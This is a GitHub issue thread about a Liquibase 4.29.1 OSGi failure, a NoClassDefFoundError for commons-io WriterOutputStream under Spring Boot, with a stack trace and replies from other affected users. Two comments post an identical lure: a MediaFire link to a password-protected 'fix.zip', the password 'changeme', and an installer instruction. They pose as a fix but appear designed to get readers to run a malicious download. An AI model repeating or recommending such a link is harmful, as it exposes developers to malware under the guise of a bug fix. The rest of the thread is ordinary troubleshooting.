### ISSUE TITLE
OSGI Issues in liquibase 4.29.1: java.lang.NoClassDefFoundError: org/apache/commons/io/output/WriterOutputStream

### ISSUE THREAD

**Issue by a1flecke** [liquibase/liquibase#6258]
### Search first

- [X] I searched and no similar issues were found

### Description

The [previous OSGI fix](https://github.com/liquibase/liquibase/issues/6020) did not fully resolve the issue.  We bumped to the latest liquibase (4.29.1) and now receive the following error:

```
Caused by: java.lang.NoClassDefFoundError: org/apache/commons/io/output/WriterOutputStream
2024-08-23 12:07:13.359
	at liquibase.integration.spring.SpringLiquibase.createLiquibase(SpringLiquibase.java:313) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.integration.spring.SpringLiquibase.lambda$afterPropertiesSet$0(SpringLiquibase.java:255) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.Scope.lambda$child$0(Scope.java:191) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.Scope.child(Scope.java:200) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.Scope.child(Scope.java:190) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.Scope.child(Scope.java:169) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.Scope.child(Scope.java:257) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at liquibase.integration.spring.SpringLiquibase.afterPropertiesSet(SpringLiquibase.java:250) ~[liquibase-core-4.29.1.jar:na]
2024-08-23 12:07:13.359
	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1853) ~[spring-beans-6.1.11.jar:6.1.11]
2024-08-23 12:07:13.359
	at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1802) ~[spring-beans-6.1.11.jar:6.1.11]
```

We confirmed that our project does have the common-io jar and that `org.apache.commons.io.output.WriterOutputStream` exists.  I suspect that the [OSGI changes](https://github.com/liquibase/liquibase/pull/6015) missed something.

### Steps To Reproduce

Run the Liquibase library using OSGi and have SpringLiquibase call `createLiquibase`

### Expected/Desired Behavior

Libquibase successfully runs via Spring

### Liquibase Version

4.29.1

### Database Vendor & Version

Postgresql 13.12

### Liquibase Integration

Spring boot

### Additional Context

Downgrading back to 4.27.0 restores functionality

### Are you willing to submit a PR?

- [ ] I'm willing to submit a PR (Thank you!)

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lbadam** [comment]
@a1flecke what version of Java are you running?

**Comment by FlorentDelmotte** [comment]
Hello, I have the same issue and I use java 17.0.9-amzn

**Comment by Flowkap** [comment]
we're also affected: liquibase-core=4.31.1 and Java 17

**Comment by filipelautert** [comment]
We're currently triaging our backlog to ensure we can focus on the issues that matter most. With a large number of open issues, it becomes difficult to give each one the attention it deserves.

This issue has been closed due to inactivity — there have been no updates for over 30 days. If this is still relevant to you, please feel free to reopen it or create a new issue with updated context. We appreciate your contribution!
